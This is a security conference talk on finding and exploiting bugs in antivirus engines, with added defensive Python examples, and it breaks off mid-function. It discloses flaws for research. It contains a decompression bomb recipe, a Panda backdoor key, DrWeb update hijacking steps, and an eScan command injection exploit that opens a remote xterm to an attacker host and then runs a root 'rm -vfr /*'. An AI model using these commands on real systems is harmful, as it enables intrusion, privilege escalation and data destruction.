Breaking Av Software

This document discusses breaking antivirus software by finding vulnerabilities in antivirus engines. It begins by introducing attacking antivirus engines, noting they are commonly written in C/C++ and must support many file formats. It then discusses specific vulnerabilities found in various antivirus engines like Avast, AVG, Avira, BitDefender, and others. These included buffer overflows, integer overflows, and remote vulnerabilities. It concludes by mentioning many antivirus products that use third-party engines could also be vulnerable. The document recommends initially using a testing suite called Nightmare to find such vulnerabilities.

Breaking Antivirus Software Joxean Koret, COSEINC SYSCAN 201

Breaking antivirus software

Introduction
Attacking antivirus engines
Finding vulnerabilities
Initial experiments
Exploiting antivirus engines
Antivirus vulnerabilities
Conclusions
Recommendations

Antivirus products

What is an Antivirus? Extracted from Wikipedia:

An antivirus is a software used to prevent, detect and remove malware such as computer viruses.

AV software can be focused in offering end-point protection (workstation products) or file-server protection (server products such as mail filters, SMB scanners, etc...). Overall, the general aim of an antivirus is to offer a better level of protection than what the underlying operating system offers alone.

And they often fail miserably...

Antivirus Engines

Common features of AV engines:

Written in C/C++.
Signatures based engine + heuristics.
On-access scanners.
Command line/GUI on-demand scanners.
Support for compressed file archives.
Support for packers.
Support for miscellaneous file formats.

Advanced common features:

Packet filters and firewalls.
Drivers to protect the product, anti-rootkits, etc...
Anti-exploiting toolkits.


Antivirus products, engines and bugs

An antivirus engine is just the core, the kernel, of an antivirus product. Some antivirus engines are used by multiple products.

For example, BitDefender is the most widely used antivirus kernel. It's used by many products like G-Data, Qihoo 360, eScan, F-Secure, etc... Most “big” antivirus companies have their own engine, but not all. And some companies, like F-Secure, integrate 3rd party engines in their products.

In general, during this talk I will refer to AV engines, to the kernels, except when the word “product” is specified. Also, unless specified as fixed, all bugs shown during this presentation are 0days.

Antivirus users

What the average user of an antivirus thinks after installing his/her preferred AV engine:

I'm safe because I use an antivirus product.

What some paranoid users of antivirus products think:

I'm safe because I use various antivirus products.

My opinion:

Any software you install makes you a bit more vulnerable. AV engines are no exception. Just the opposite. ...

Attack surface

Fact: installing an application in your computer makes you a bit more vulnerable.

You just increased your attack surface.

If the application is local, your local attack surface increased.
If the application is remote, your remote attack surface increased.
If your application runs with the highest privileges, installs kernel drivers, a packet filter and tries to handle anything your computer may do...

Your attack surface dramatically increased.

Myths and reality

Antivirus propaganda:

“We make your computer safer with no performance penalty!”
“We protect against unknown zero day attacks!”

Reality:

AV engines make your computer more vulnerable with a varying degree of performance penalty. The AV engine is as vulnerable to zero day attacks as the applications it tries to protect from. And can even lower the operating system exploiting mitigations, by the way...


Attacking antivirus engines

AV engines, commonly, are written in non managed languages due to performance reasons.

Almost all engines are written in C and/or C++ with only a few exceptions, like the old MalwareBytes, written in VB6 (!?). It translates into buffer overflows, integer overflows, format strings, etc...

Most AV engines install operating system drivers.

It translates into possible local escalation of privileges.

AV engines must support a long list of file formats:

Rar, Zip, 7z, Xar, Tar, Cpio, Ole2, Pdf, Chm, Hlp, PE, Elf, Mach-O, Jpg, Png, Bz, Gz, Lzma, Tga, Wmf, Ico, Cur... It translates into bugs in the parsers of such file formats.

Attacking antivirus engines

AV engines need to support such a large list of file formats quickly and even better than the vendor.

If an exploit for a new file format appears, customers will ask for support for such files as soon as possible. The longer it takes, the higher the odds of losing a customer moving on to another vendor.

Example: Adobe Acrobat. The producer doesn't need to “support” malformed files. The AV engine actually needs to do so.

The vendor needs to handle malformed files but only to refuse them, as repairing such files is an open door for vulnerabilities.

Attacking antivirus engines

Most (if not all...) antivirus engines run with the highest privileges: root or local system.

If one can find a bug and write an exploit for the AV engine, (s)he just won root or system privileges. Sandboxes, virtual machines, etc... are extremely rare.

Most antivirus engines update via HTTP only protocols:

If one can MITM the connection (for example, in a LAN) one can install new files and/or replace existing installation files. It often translates in completely owning the machine with the AV engine installed, as updates are not commonly signed. Yes. They aren't.

I will show later one of the many vulnerable products...

Attacking antivirus engines

AV engines often offer on-access scanners and behaviour based heuristic engines. Such scanners are usually implemented in 3 different ways:

A sandbox on top of the AV's Intel x86 emulator. Very slow but, also, very little odds to attack such component.
A driver to monitor file creation/access as well as process behaviour, communicating with a user-level component. There is space for a possible EoP.
Injecting libraries in all user processes and hooking special functions. The easiest way to implement heuristic engines.

Often, such “protection” methods make things worse than not having an antivirus engine.

I'll show later on why with some real vulnerabilities...

Finding vulnerabilities

Vulnerabilities in AV engines

Started around end of July/beginning of August to find vulnerabilities, for fun, in AV engines.

In my spare time, some hours from time to time.

Found remote and local vulnerabilities in 19 AV engines or AV products.

Most of them in the first 2 months. I tested ~17 engines (I think, I honestly do not remember). It says it all.

I'll talk about some of the vulnerabilities I found. The following are just a couple of them...

AV engines vulnerabilities

Avast: Heap overflow in RPM (reported, fixed and Bug Bounty paid).
Avg: Heap overflow with Cpio (fixed...) / Multiple vulnerabilities with packers.
Avira: Multiple remote vulnerabilities.
BitDefender: Multiple remote vulnerabilities.
ClamAV: Infinite loop with a malformed PE (reported & fixed, patch available soon).
Comodo: Heap overflow with Chm.
DrWeb: Multiple remote vulnerabilities.
ESET: Integer overflow with PDF / Multiple vulnerabilities with packers.
F-Prot: Heap overflows with multiple packers.
F-Secure: Multiple remote vulnerabilities (contacted, amazingly collaborative).
Panda: Multiple local privilege escalations (reported and partially fixed).
eScan: Remote command injection.

And many more...

Broken AV products...

The list is interminable... but, using this list http://www.av-comparatives.org/av-vendors/

...anything using a 3rd party engine which is not Vipre, Norman, Cyren or Agnitum.

Examples: Qihoo 360, F-Secure, G-Data, eScan, Emsisoft, BullGuard, Immunet, etc...

+ all the AV products using the AV engines mentioned in the previous slide.
+ some rare AV products like BkAV.

How to find such vulnerabilities?

I used initially a fuzzing testing suite of my own: Nightmare.

http://www.joxeankoret.com/download/Nightmare-0.0.2.tar.gz
I will eventually upload the code to GitHub.com

Downloaded all the AV engines with a Linux version I was able to find.

The core is always the same with the only exception of some heuristic engines. Also used some (dirty) tricks to run Windows only AV engines in Linux.

Fuzzed the command line tool of each AV engine by simply using radamsa + the testing suite of ClamAV, many different EXE packers and some random file formats. Results: dozens of remotely exploitable vulnerabilities. Also, I performed basic local and remote checks:

ASLR, null ACLs, updating protocol, network services, etc...

Initial experiments

Fuzzing statistics

A friend of mine convinced me to write a fuzzer and do a “Fuzzing explained” like talk for a private conference.

Really simple fuzzing engine with a max. of 10 nodes.

I'm poor... I cannot “start relatively small, with 300 boxes” like Google people do.

Used this fuzzing suite to fuzz various Linux based AV engines, those I was able to run and debug. For that talk I did fuzz/test the following ones:

BitDefender, Comodo, F-Prot, F-Secure, Avast, ClamAV, AVG.

Results...

ClamAV

Only 1 non reproducible crash :(

Ran for about 2 weeks.

Only 1 DOS (found manually): 1 infinite loop with a malformed PE. Asked to remain silent until a public patch is published.

Honestly, I was very surprised. It seems they use fuzzing.

Well done guys!

F-Secure

No crash at all. Only found 1 memory exhaustion bug with CPIO.

Consumes gigabytes of memory.

I was sure I was doing something wrong and I verified it later on... Decided not to continue at that moment because it was too heavy and required root for debugging.

Avast

4 different bugs.

Some of them disappeared quickly...

1 of them seemed to be exploitable.

RPM support. Bug reported and fixed.

This is one of the AV engines I fuzzed the most, ~1 month. They have a Bug Bounty!

Only reason why I contacted them.

Comodo AV

Only 4 crashes. 2 different bugs. 1 seems to be exploitable.

Heap overflow with CHM files when uncompressing data...

IMHO, it didn't fail more because they don't support anything...

F-Prot

Several different bugs. Only left for around 2/3 hours. The bugs seem to be all exploitable.

Armadillo, PECompact, ASPack and Yoda's Protector unpackers. Crashes at memcpy coming from different paths...

AVG

Hundreds of crashes, fuzzed “manually” :(

It sends crash reports automatically :/ I hate you. It needs to be fed via STDIN. Annoying.

Several different bugs found. 2 of them seem to be exploitable.

CPIO and XAR files support. 1st one fixed recently :/ XAR one still 0day.

BitDefender

Thousands of crashes. 7 different bugs.

Most of them with EXE unpackers and EXE uncompressors. Thinstall and Shrinker, for example.

2 of them seem to be exploitable.

More about fuzzing AV engines

Most AV engines are Windows only. However, we can still fuzz them in non Windows based environments (Linux requires less memory and disk). What I have done:

Try to run it with Wine. If it works use WineDBG + GDB server and connect IDA or GDB to the target. If it doesn't work, reverse engineer the core engine and write a simpler wrapper for it.

Very time consuming but the best option.

...

More about fuzzing AV engines

AV engines take a long while loading the core. They need to load all the signatures, unpack/decrypt them in memory, etc... The solution: use in-memory fuzzing.

Reverse engineer your favourite AV's core engine and find the functions where files are being scanned. Debug the target application with IDA and use the AppCall feature to call those functions with your own input, for example. You don't need to restart it again and again. Just wait for it to crash while continuously feeding fuzzed inputs.

However, it may cause some false positives:

Some files/buffers can be discarded at some point before that scanning routine.


Exploiting AV engines

What will be briefly covered:

Remote exploitation.

What will not be:

Local exploitation of local user-land or kernel-land vulnerabilities. I have no knowledge about kernel-land, sorry. Later on, I will discuss some local vulnerability and give details about how to exploit it, but it isn't kernel stuff and is too easy to exploit.

Exploiting AV engines

Exploiting an AV engine is like exploiting any other client-side application.

It is not like exploiting a browser or a PDF reader. It is more like exploiting an Office file format.

Exploiting memory corruptions in client-side applications remotely can be quite hard nowadays due to ASLR.

However, AV engines make too many mistakes too often so, don't worry ;) ...

Exploiting AV engines

In general, AV engines are all compiled with ASLR enabled. But it's common that only the core modules are compiled with ASLR.

Not the GUI related programs and libraries, for example.

Some libraries of the core of some AV engines are not ASLR enabled.

Check your target/own product, there isn't only one ;)

Exploiting AV engines

Even in “major” AV engines...

...there are non ASLR enabled modules.
...there are RWX pages at fixed addresses.
...they disable DEP.

Under certain conditions, of course. The condition, often, is the emulator.

Exploiting AV engines

The x86 emulator is a key part of an AV engine. It's used to unpack samples in memory, to determine the behaviour of an executable program, etc... Various AV engines create RWX pages at fixed addresses and disable DEP as long as the emulator is used.

Very common. Does not apply to only some random AV engine.

...

Exploiting AV engines (more tips)

By default, an AV engine will try to unpack compressed files and scan the files inside. A compressed archive file (zip, tgz, rar, ace, etc...) can be created with several files inside. The following is a common AV engines exploitation scenario:

Send a compressed zip file. The very first file inside forces the emulator to be loaded and used. The 2nd one is the real exploit.

Exploiting AV engines

AV engines implement multiple emulators. There are emulators for x86, AMD64, ARM, JavaScript, VBScript, ... in most of the “major” AV engines. The emulators, as far as I can tell, cannot be used to perform heap spraying, for example. But they expose a considerable attack surface.

It's common to find memory leaks inside the emulators, specially in the JavaScript engine. They can be used to construct complex exploits as we have a programming interface to craft inputs to the AV engine.

Exploiting AV engines: Summary

Exploiting AV engines is not different to exploiting other client-side applications. They don't have/offer any special self-protection. They rely on the operating system features (ASLR/DEP) and nothing else.

And sometimes they even disable such features. The emulators, x86, AMD-64, ARM, JavaScript, ... usually.

There are programming interfaces for exploit writers:

Multiple files doing different actions each can be sent in one compressed file as long as the order inside it is kept. Owning the AV engine means getting root or system in all AV engines I tested. There is no need for a sandbox escape, in general.

Antivirus vulnerabilities

Details about some vulnerabilities in AV engines and products...

Extracted from http://theoatmeal.com/comics/grump Copyright © Matthew Inman

Disclaimer

I'm only showing a couple of my vulnerabilities.

I contacted 4 vendors for different reasons:

Avast. They offer a Bug Bounty. Well done guys!
ClamAV. Their antivirus is Open Source.
Panda. I have close friends there.
Ikarus, ESET and F-Secure. They contacted me and asked for help nicely.

I do not “responsibly” contact multi-million dollar companies.

I have the bad habit of eating 3 times a day... I don't give my research for free. Audit your products...

Local Escalation of Privileges

Example: Panda Multiple local EoPs

In the product Global Protection 2013 there are various processes running as SYSTEM. Two of those processes have a NULL process ACL:

WebProxy.EXE and SrvLoad.EXE

We can use CreateRemoteThread to inject a DLL, for example. Two very easy local escalations of privileges. But the processes are “protected” by the shield.

Example: Panda Multiple local EoPs

Another terrible bug: Panda's installation directory has write privileges for all users. However, again, the directory is “protected” by the shield... What is the fucking shield?

...

Example: Panda Multiple local EoPs

The Panda shield is a driver that protects some Panda owned processes, the program files directory, etc... It reads some registry keys to determine if the shield is enabled or disabled.

But... the registry key is world writeable.

Also, it's funny, but there is a library (pavshld.dll) with various exported functions...

...

Example: Panda Multiple local EoPs

All exported functions contain human readable names. All but the 2 first functions. They are called PAVSHLD_001 and 002. Decided to reverse engineer them for obvious reasons... The 1st function is a backdoor to disable the shield. It receives only 1 argument, a “secret key” (GUID):

ae217438-159a-9178-5a8f-2606b59d5f13

If the key is correct, then the corresponding registry keys are written.

Well, it is easier than writing the registry entries yourself...

MOAR PANDA!

There are more stupid bugs in this AV engine... For example, no library is compiled with ASLR enabled. One can write a reliable exploit for Panda without any real big effort. And, also, one can write an exploit targeting Panda Global Protection users for any program. Why? Because the product injects 6 libraries without ASLR enabled in all processes. Yes.

Panda

I reported the vulnerabilities because I have friends there. Some of them are (supposedly) fixed, others not...

The shield backdoor. The permissions of the Panda installation directory.

The injection of non randomized libraries bug that allows writing targeted exploits remains... Also, during my latest testing of their very last version, other local vulnerabilities appeared...

ASLR related (Address Space Layout Randomization)

ASLR disabled

We already discussed that Panda Global Protection doesn't enable ASLR for all modules. Do you believe this is an isolated problem of just one antivirus product? As is common with antivirus products/engines, such problems are not specific...

One example...

Forticlient

The process av_task.exe is the actual AV scanner...

Forticlient

Most libraries and binaries in Forticlient don't have ASLR enabled.

Exploiting Forticlient with so many non ASLR enabled modules once a bug is found is trivial.

You may think that this is a problem that doesn't happen to the “big” ones...

Think again.

2 random AVs nobody uses...

Kaspersky

Libraries avzkrnl.dll and module vlns.kdl, a vulnerability scanner (LOL), are not ASLR enabled. One can write a reliable exploit for Kaspersky AV without any real effort.

BitDefender

It's kind of easier to write an exploit for BitDefender...

Security service my ass...

BKAV

BKAV is a Vietnamese antivirus product. Gartner recognizes it as a “Cool vendor in Emerging Markets”. I recognize it as a “Cool antivirus for writing targeted exploits”...

BKAV

They don't have ASLR enabled for their services...

BKAV

And, like Panda, they inject a non ASLR enabled library system wide, the Bkav “firewall” engine...

...miserably failing at securing your computer.

AV developers writing security software

Remote Denial of Service

Examples: ClamAV DOS

There is a bug in ClamAV scanning some resource directory in PE files.

I have been asked to wait until there is a public patch. It's fixed in their private repository but the patch is big so it needs some proper testing. Sorry, I cannot give all the details yet :(

Found via dumb ass fuzzing. Reported. Because it's Open Source... https://bugzilla.clamav.net/show_bug.cgi?id=10640

The vulnerability was nicely handled by the ClamAV team (now Cisco).

Decompression bombs (multiple AVs)

Do you remember them? If I remember correctly, the 1st discussion in Bugtraq about it was in 2001.

A compressed file with many compressed files inside or with really big files inside. It can be considered a remote denial of service.

Do you think AV engines are not vulnerable any more to such bugs after more than 10 years?

In this case, you're wrong. Look at the following table....

Failing AVs

Rows are archive formats; columns are, in order, ESET, BitDefender, Sophos, Comodo, AVG, Ikarus, Kaspersky. An X marks an engine that failed on that format:

ZIP: X (*) X X X X X (**)
GZ: X (***)
BZ2:
RAR: X (***) X X X
7Z:

* Sophos finishes after ~30 seconds. In a “testing” machine with 16 logical CPUs and 32 GB of RAM.
** Kaspersky creates a temporary file. A 32GB dumb file is a ~3MB 7z compressed one.
*** In my latest testing, ESET finishes after 1 minute with each file in my “small testing machine”.

Decompression bombs: How to

To create a simple decompression bomb in Unix issue the following commands:

$ truncate -s 8485539452 dumb   # 8GB
$ 7z/gzip/bzip2/rar/lcab/compress/xxx dumb

That's all. The resulting file is always less than 10 MB. I couldn't believe that still nowadays antivirus engines failed at this trivial “attack” when I “discovered” this...
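The scanner-side counterpart of the two commands above is a bounded inflater. The following is an added example, not code from the slides or from any vendor: it inflates a zlib stream through `decompressobj` with `max_length`, so an absolute output cap and a compressed-to-inflated ratio cap are checked before the next chunk is produced instead of after the whole member has been expanded. The bomb is constructed in memory (a run of zero bytes) rather than with `truncate`; the limits, helper names and sample data are this example's assumptions.

```python
import zlib

MAX_INFLATED = 8 * 1024 * 1024   # absolute cap per archive member (assumed policy value)
MAX_RATIO = 100                  # inflated:compressed ratio above which we stop (assumed)
CHUNK = 64 * 1024                # output zlib may produce per call


class DecompressionBomb(Exception):
    """Raised as soon as a member blows past the configured limits."""


def safe_inflate(blob: bytes, max_inflated: int = MAX_INFLATED,
                 max_ratio: int = MAX_RATIO) -> bytes:
    """Inflate a zlib stream while enforcing size and ratio limits.

    decompressobj.decompress(data, max_length) returns at most max_length
    bytes and parks the unread input in unconsumed_tail, so every limit is
    tested between chunks and a tiny bomb never gets fully expanded.
    """
    inflater = zlib.decompressobj()
    out = bytearray()
    pending = blob
    while not inflater.eof:
        chunk = inflater.decompress(pending, CHUNK)
        out += chunk
        if len(out) > max_inflated:
            raise DecompressionBomb(f"member inflates past {max_inflated} bytes")
        if len(out) > max_ratio * max(len(blob), 1):
            raise DecompressionBomb(f"compression ratio exceeds {max_ratio}:1")
        pending = inflater.unconsumed_tail
        if not chunk and not pending:
            # No output and no input left: truncated stream, stop here.
            break
    return bytes(out)


def scan_member(blob: bytes) -> tuple:
    """Verdict for one compressed member: ('ok', inflated_size) or ('bomb', reason)."""
    try:
        data = safe_inflate(blob)
    except DecompressionBomb as exc:
        return ("bomb", str(exc))
    return ("ok", len(data))


def build_bomb(inflated_size: int = 32 * 1024 * 1024) -> bytes:
    """Constructed sample: 32 MB of zeros compress to a few tens of kilobytes."""
    return zlib.compress(b"\0" * inflated_size, 9)


def build_benign() -> bytes:
    """Constructed sample: a low-ratio payload resembling a real file."""
    return zlib.compress(bytes(range(256)) * 8, 9)


if __name__ == "__main__":
    print(scan_member(build_bomb()))    # ('bomb', 'compression ratio exceeds 100:1')
    print(scan_member(build_benign()))  # ('ok', 2048)
```

The ratio cap fires first on the zero-run bomb because 100 times its ~32 KB compressed size is below the 8 MB absolute cap; on a large legitimate file the absolute cap is what eventually bounds memory and disk. Both limits belong in the archive walker as well, since nested archives multiply the ratio at each level.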

BitDefender engine

BitDefender is a Romanian antivirus engine. Their AV core is the most widely distributed AV engine in other AV products.

To name a few: F-Secure, G-Data, Qihoo 360, eScan, LavaSoft, Immunet, ...

It suffers from a number of vulnerabilities like almost all other AV engines/products out there. Finding vulnerabilities in this engine is trivial.

An easy example...

BitDefender bugs

Modifying 2 DWORDs in a PE file packed with the Shrinker3 packer will make it crash:

Those bytes are used to calculate the file and sections alignment of the new, in memory, unpacked PE file. When set to 0xFFFFFFFF and 0xFFFFFFF, both file and sections alignment will be set to 0...

BitDefender bugs

...and their values will be used, later on, in some arithmetic operations:

Those 2 bugs are trivial to discover.
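The alignment bug above and the ASLR remarks earlier in the deck call for the same small check, so one added example (not the slides' code and not any vendor's unpacker) covers both: it reads the PE optional header fields that later arithmetic depends on (SectionAlignment, FileAlignment) and refuses the two corrupt cases described here before anything divides by or rounds to them, and it reads DllCharacteristics from the same header to report whether a module opts in to ASLR (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) and DEP (IMAGE_DLLCHARACTERISTICS_NX_COMPAT). The sample header is constructed inside the block; the validation rules are this example's choice.

```python
import struct

# IMAGE_DLLCHARACTERISTICS flags from the PE specification
DYNAMIC_BASE = 0x0040      # image may be rebased at load time (ASLR opt-in)
NX_COMPAT = 0x0100         # image is DEP compatible
OPTIONAL_HEADER_SIZE = 224  # PE32 optional header including 16 data directories


def build_pe_header(section_align: int = 0x1000, file_align: int = 0x200,
                    dll_chars: int = DYNAMIC_BASE | NX_COMPAT) -> bytes:
    """Constructed sample input: a minimal PE32 header with no sections.

    It is not a loadable image; it only carries the fields the checker reads.
    """
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # COFF file header: i386, no sections, 224-byte optional header, EXEC|32BIT
    coff = struct.pack("<HHIIIHH", 0x014C, 0, 0, 0, 0, OPTIONAL_HEADER_SIZE, 0x0102)
    # Optional header bytes 0..31: Magic, linker version, sizes, entry point, bases, ImageBase
    opt = struct.pack("<HBBIIIIIII", 0x010B, 14, 0, 0, 0, 0,
                      0x1000, 0x1000, 0x2000, 0x400000)
    # Bytes 32..71: SectionAlignment, FileAlignment, OS/image/subsystem versions,
    # Win32VersionValue, SizeOfImage, SizeOfHeaders, CheckSum, Subsystem, DllCharacteristics
    opt += struct.pack("<IIHHHHHHIIIIHH", section_align, file_align,
                       6, 0, 0, 0, 6, 0, 0, 0x3000, 0x400, 0, 2, dll_chars)
    opt += b"\0" * (OPTIONAL_HEADER_SIZE - len(opt))
    return dos + b"PE\0\0" + coff + opt


def inspect_pe(data: bytes) -> dict:
    """Read the alignments and DllCharacteristics, validating before any use."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    opt = e_lfanew + 4 + 20
    if opt + 72 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE header missing or truncated")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x010B, 0x020B):   # PE32 and PE32+ share these offsets
        raise ValueError(f"unknown optional header magic 0x{magic:X}")
    section_align, file_align = struct.unpack_from("<II", data, opt + 32)
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]

    problems = []
    for name, value in (("SectionAlignment", section_align),
                        ("FileAlignment", file_align)):
        if value == 0:
            problems.append(f"{name} is 0")     # any later division or rounding faults
        elif value & (value - 1):
            problems.append(f"{name}=0x{value:X} is not a power of two")  # e.g. 0xFFFFFFFF
    if not problems and file_align > section_align:
        problems.append("FileAlignment exceeds SectionAlignment")
    return {
        "section_alignment": section_align,
        "file_alignment": file_align,
        "aslr": bool(dll_chars & DYNAMIC_BASE),
        "dep": bool(dll_chars & NX_COMPAT),
        "problems": problems,
    }


if __name__ == "__main__":
    print(inspect_pe(build_pe_header()))                      # no problems, aslr/dep True
    print(inspect_pe(build_pe_header(0xFFFFFFFF, 0xFFFFFFF)))  # two alignment problems
    print(inspect_pe(build_pe_header(dll_chars=0)))            # aslr/dep False
```

An unpacker that rebuilds an in-memory image should run the alignment checks on the values it computes for the new image, not only on the input header, since here the corrupt DWORDs live in packer data and only become alignments after the unpacker's own arithmetic. Running `inspect_pe` over every module an AV product ships is the “check your target/own product” audit the deck asks for.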

BitDefender notes

This and all BitDefender's bugs don't affect exclusively BitDefender's products. It affects many AV products out there as previously mentioned. Adding a new AV engine to your product may sound “cool” but you're making 3rd party bugs yours. And, by the way, you didn't audit it before adding it to your product...

Otherwise, I doubt you would have added it.

ESET Nod32

ESET Nod32 is a Slovak AV engine. Like most AV engines it suffers from a number of vulnerabilities that can be trivially discovered. One little example: a malformed PDF file.

A negative or big value for any element of a /W(idth) element with arrays will make it crash. A simple remote denial of service.

ESET Nod32 bug with PDF files

According to ESET sources they use fuzzing as part of QA.

I think they are not doing it very well...

Finding this bug is trivial, like all the ones I previously showed.

F-Secure

F-Secure is an antivirus from Finland. They use 2 AV engines: their own one and BitDefender's one.

So, the previous bug, the BitDefender one, also affects this AV product.

Like with the whole majority of AV engines out there, there are rather easy to discover bugs in their (own) engine. Let's see a simple vulnerability they fixed in February.

F-Secure bug with InnoSetup

There was a little bug handling some InnoSetup installers. The bug is at InnoDecoder::IsInnoNew(). A size for a call to FMalloc can be controlled:

F-Secure bug with InnoSetup

A negative size will make malloc fail but it will anyway memset the buffer...

Basically, memset(NULL, '\0', negative_size). Another bug trivial to discover by any means.

Proof of concepts

Proof of concepts for the last discussed bugs can be downloaded from here:

http://www.joxeankoret.com/download/3ea0406f0e483c

Shortened URL:

http://x50.es/7Lm

Remote Code Execution

DrWeb antivirus

DrWeb is a Russian antivirus. Used, for example, by the largest bank (Sberbank) and the largest search engine in Russia (Yandex) + the Duma, to name a few customers. More of their propaganda:

DrWeb updating protocol

DrWeb updates via HTTP only. They do not use SSL/TLS. It downloads a catalog file first:

Example for Linux:

http://<server>/unix/700/drweb32.lst.lzma

In the catalog file there is a number of updatable files + a hash for them:

VDB files (Virus DataBases). DrWeb32.dll.

The hash is, actually, CRC32 and no component is signed, not even the DrWeb32.dll library.

DrWeb updating protocol

The highest grade of certificate requires the highest grade of check for their database files and libraries: CRC32. High standards. To exploit in a LAN intercept the following domains:

update.nsk1.drweb.com
update.drweb.com
update.msk.drweb.com
update.us.drweb.com
update.msk4.drweb.com
update.msk6.drweb.com
update.fr1.drweb.com
update.us1.drweb.com
update.nsk1.drweb.com

...and replace drweb32.dll with your “modified” (lzma'ed) version.

DrWeb updating protocol

Exploiting it is rather easy with ettercap and a quick Python web server + the Unix lzma tool.

You only need to calculate the CRC32 checksum and compress (lzma) the drweb32.dll file.

I tested the bug under Linux, full code execution is possible.

Though you need to be in a LAN to be able to do so, obviously.

In my opinion, this updating protocol is horrible.
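To make concrete why a CRC32 in an unauthenticated catalog proves nothing, the following added example (not DrWeb's protocol or code) models the two update designs side by side: a CRC32-only catalog, which anyone on the path can regenerate for a replaced library, and a manifest whose per-file hashes are covered by a verification tag the on-path party cannot recompute, read by a strict parser that also rejects anything trailing the tag. The tag is an HMAC-SHA256 under a placeholder key only because the standard library has no public-key signatures; a real updater ships just a public key and verifies an asymmetric signature (Ed25519, RSA-PSS) over the manifest, which is what the recommendations at the end of the deck ask for. File names, contents and the key are constructed.

```python
import hashlib
import hmac
import zlib

# Constructed sample data (not real DrWeb files or keys)
GENUINE = {"drweb32.dll": b"vendor-built library bytes v1",
           "virus.vdb": b"signature database v1"}
REPLACED_DLL = b"library bytes supplied by someone on the LAN"
VENDOR_KEY = b"placeholder-vendor-key"   # stands in for the vendor's private signing key


def crc_catalog(files: dict) -> str:
    """Catalog in the style described above: one 'name crc32' line per file."""
    return "".join(f"{n} {zlib.crc32(b):08x}\n" for n, b in sorted(files.items()))


def verify_crc_catalog(catalog: str, files: dict) -> bool:
    """Client check when the only protection is a CRC32 per file."""
    for line in catalog.splitlines():
        name, crc = line.split()
        if name not in files or f"{zlib.crc32(files[name]):08x}" != crc:
            return False
    return True


def sign_manifest(files: dict, key: bytes) -> str:
    """Vendor side: hash every file, then cover the whole body with a tag."""
    body = "".join(f"{n} sha256:{hashlib.sha256(b).hexdigest()}\n"
                   for n, b in sorted(files.items()))
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return body + f"sig {tag}\n"


def verify_signed_manifest(manifest: str, files: dict, key: bytes) -> bool:
    """Client side: the tag must be the last line, nothing may follow it,
    and every listed file must match its hash."""
    lines = manifest.splitlines(keepends=True)
    if not lines or not lines[-1].startswith("sig ") or not lines[-1].endswith("\n"):
        return False
    body, tag = "".join(lines[:-1]), lines[-1].split()[1]
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return False
    for line in body.splitlines():
        name, digest = line.split()
        if name not in files or digest != "sha256:" + hashlib.sha256(files[name]).hexdigest():
            return False
    return True


def on_path_replacement() -> dict:
    """Outcome of the library swap described above against each design."""
    swapped = dict(GENUINE, **{"drweb32.dll": REPLACED_DLL})
    # CRC32-only: the catalog is regenerated for the swapped file and the client accepts it.
    crc_accepts = verify_crc_catalog(crc_catalog(swapped), swapped)
    # Signed manifest: without VENDOR_KEY no valid tag exists for the swapped file,
    # so the best available move is replaying the genuine manifest; the hash mismatch rejects it.
    genuine_manifest = sign_manifest(GENUINE, VENDOR_KEY)
    signed_accepts = verify_signed_manifest(genuine_manifest, swapped, VENDOR_KEY)
    # Data appended after the tag must be refused as well.
    trailing = verify_signed_manifest(genuine_manifest + "extra.dll sha256:00\n",
                                      GENUINE, VENDOR_KEY)
    return {"crc_only_accepts": crc_accepts,
            "signed_accepts": signed_accepts,
            "trailing_data_accepts": trailing}


if __name__ == "__main__":
    print(on_path_replacement())
    # {'crc_only_accepts': True, 'signed_accepts': False, 'trailing_data_accepts': False}
```

Transport security (TLS) and the manifest signature address different failures: TLS stops the on-path swap, the signature also catches a compromised mirror or CDN node, which is why the deck asks for both.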

eScan for Linux

eScan is an AV product from the USA (MicroWorld Technologies). I was bored some random night in Singapore and found that the eScan product has a Linux version. I downloaded and installed it (~1 hour because of the awful hotel's connection). Then I started checking what it installs, looking for SUID binaries, etc...

They use the BitDefender and ClamAV engines, they don't have their own engine so, no need to test the scanners.

I already had vulnerabilities for such engines...

They install a Web server for management and a SUID binary called:

/opt/MicroWorld/sbin/runasroot

eScan for Linux

The SUID binary allows the following users to execute root commands:

root, mwconf (created during installation).

The eScan management application (called MwAdmin) is so flawed I decided to stop at the first RCE...

A command injection in the login form (PHP). In a “security” product. Yes.

eScan for Linux login page

eScan for Linux remote root

This specific bug requires knowing/guessing an existing user. Not so hard. The user name and the password are used to construct an operating system command executed via PHP's function “exec”.

I was not able to inject in the user name. But I was able to inject in the password.

...

Source code of login.php (I)

Source code of login.php (II)

The password sent by the user is passed to check_user:

There are some very basic checks against the password.

Specially for shell escape characters. But they forgot various other characters like 'Q'.

Source code of common_functions.php

Then, the given password is used in the function check_user like this:

eScan for Linux RCE

My super-ultra-very-txupi-complex exploit for it:

$ xhost +
$ curl --data \
  "product=1&[email protected]&pass=1234567; DISPLAY=YOURIP:0;xterm;" \
  http://target:1[...]/login.php

Once you're in, run this to escalate privileges:

$ /opt/MicroWorld/sbin/runasroot /usr/bin/xterm

Or anything else you want...

$ /opt/MicroWorld/sbin/runasroot rm -vfr /*
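The eScan login bug is the textbook case of a blacklist in front of a shell. As an added example that does not reproduce eScan's PHP (the page shows no source), the block below writes the same pattern in Python next to its fix: the vulnerable version hands a string built from the password to /bin/sh after filtering a few metacharacters but, as the slides describe, not all of them; the fixed version never involves a shell, passing an argument vector, and additionally confines the password to an allowlist. `echo` stands in for whatever the real check_user executed; the blacklist, allowlist and payload are constructed for this example, the payload being the page's own `;` separator.

```python
import re
import subprocess

# Partial escape-character filter of the kind the page describes: it blocks some
# shell metacharacters but not the ';' command separator (constructed example).
INCOMPLETE_BLACKLIST = re.compile(r"[`$|&<>]")
# Hardened form: only accept what a password is allowed to contain at all.
PASSWORD_ALLOWLIST = re.compile(r"[A-Za-z0-9._@!#%^*+=-]{1,64}")


def check_user_vulnerable(user: str, password: str) -> str:
    """String-built command handed to the shell: the injection point."""
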